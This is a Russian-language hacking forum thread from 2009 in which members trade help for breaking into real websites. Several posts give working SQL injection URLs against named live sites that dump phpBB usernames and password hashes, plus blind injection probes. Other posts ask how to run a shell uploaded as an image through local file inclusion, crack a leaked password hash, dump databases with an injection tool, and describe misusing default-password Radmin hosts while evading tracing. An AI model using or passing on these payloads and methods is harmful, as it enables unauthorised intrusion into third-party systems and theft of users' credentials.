Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7+from+phpbb_users--+
     
    1 person likes this.
  2. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Подскажите плиз можно ли провести SQL-inj
    Строка вида site.ru/?cat=menu'
    Если оборсать строка menu'--+ то не ошибки не инфы не выводит...
    А вот если menu'+ То инфа выводится как при нормальном запросе

     
    #7202 Byrger, 21 May 2009
    Last edited: 21 May 2009
  3. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Идет слеширование кавычек а без них запрос не завершит, ищи числовые данные в передоваемых скрипту значениях, зачастую они идут в запрос без кавычек, и как правило где есть одна скуля на одном сайте есть и другие.
    для админов можно и так

    http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,group_concat(concat_ws(0x3a,username,user_password)+separator+'<br>'),4,5,6,7+from+phpbb_users+where+user_level=1--+
     
    #7203 PaCo, 21 May 2009
    Last edited: 21 May 2009
  4. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    local include

    залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:

    Warning: include_once() [function.include]: Failed opening 'CLASS_FILE' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/webdev/public_html/......../class.search.php on line 2
    Warning: require_once(CLASS_SESSION_ACTION) [function.require-once]
    Warning: include_once(CLASS_FILE) [function.include-once]
    Fatal error: require_once() [function.require]

    как мне используя это запустить шелл? в примерах описал локал инклуд вида .php?id=ит.д. а у меня просто /class.search.php
     
  5. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    да я тоже прочитал и при таком раскладе выходит это
    oxana:c4ca4238a0b923820dcc509a6f75849b
    administrator:30f46374c898450c560f8c14999b7ff7-
    что это означает первая часть логин а второе как расшифровать
     
  6. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    2AET - начни что то читать, а то это не дело так, если учесть что ты еще шелл захочешь залить то тут твоих вопросов будет на 10 страниц, это md5
    oxana:c4ca4238a0b923820dcc509a6f75849b - 1
    то есть логин - oxana пароль 1
     
  7. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Вторая - это md5 хеш того, что находится в колонке user_password
    для расшифровки есть много сервисов, или же самостоятельно брутить с помощью скажем пассворд рековер..
     
  8. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    вот полный путь: http://www.anh.gov.co/scripts/tiny_mce/plugins/ajaxfilemanager/inc/class.search.php
     
  9. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    Люди help plz. Я кароч насканил кучу ip нашол дефлотные радминов. и без проксей
    подрубился и начал пакостить
    1) У радмина v2 or v2.1 есть log где айпишники подрубившихся?
    2)если я подключился к дефлотному радмину - это наказуемо (преступление)?
    3)Радмин v2 or v2.1 ведёт лог что с токогото ip была запушена какянит прога?
    4)Я сижу под NAT'ом с динамичким ip. ADSL
    меня могут вычислить?
     
  10. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Всем привет.! Вопрос такой:
    Юзаю SIPT 4.0
    Все настроил и он оперделил принт поля.
    Надо задампить бд... но как? //как настроить прогу
    Нада вот так
    http://......../i.php?id=.......+limit+0,1
    http://......../i.php?id=.......+limit+1,1
    .........................................................
    Руками я не могу делать - много записей.
     
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    da
    da
    net
    da
     
  12. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Если 4-ая ветка - table brutforce, потом поля.
    Если 5-ая ветка - Get Names From Information_Schema

    Чтобы инфу с таблицы тащить:

    1. Ставишь галочку на нужных колонках.
    2. Выбираешь кол-во записей, которое хочешь вытащить - For MySql From 0 to 1000
    3. Нажимаешь Get Data
     
    1 person likes this.
  13. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    накатай скрипт для сбора записей)
     
  14. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    что можно сделать с этим...
    http://imhognito.net/promo.php?t=ub+union+select+1111111,22222222,33333333,44444444444/*&id=2edf0816d583290eb819f1b4cd946244
    ?
     
  15. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Вот здесь вот интересная ситуация

    http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13'
     
  16. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    id фильтруется вроде как, а вот как ты юнино подбирал не пойму "t=ub" это помоему просто кейс не относящийся к запросу )
     
    1 person likes this.
  17. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    вопрос но XSS
    немогу суть уловить. Вот говорят мол если фильтруються некоторые символы, то можно ппробывать использовать их десятичные или 16-ные коды.
    Я понимаю что пожно для поссивных XSS, в браузерной строке вместо " вбить %22 и оно сработает как кавычка. А при активных ? при замене " на &#34 или " нехрена непомогает, притом <тег> ... </тег> должны быть 100% написаны в авном виде без кодов., да и если в нуть скрипта пихнуть че, например alert заменить на его коды то нехрена оно несработает.
    Где я неправ ??? поправте.
     
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    И чем она интересна ?
     
  19. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    а ты попробуй поля подобрать и увидешь )
     
    1 person likes this.
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    А чо тут подбирать-то:

    Code:
    http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+order+by+1
    
    Но видать запрос сложный, участвует ни одна таблица только, но скуля есть, хоть и блайнд:

    Code:
    http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=0
    
    http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=1
    
    4-ая ветка:

    Code:
    http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13+and+substring(version(),1,1)=4
    
     
Thread Status:
Not open for further replies.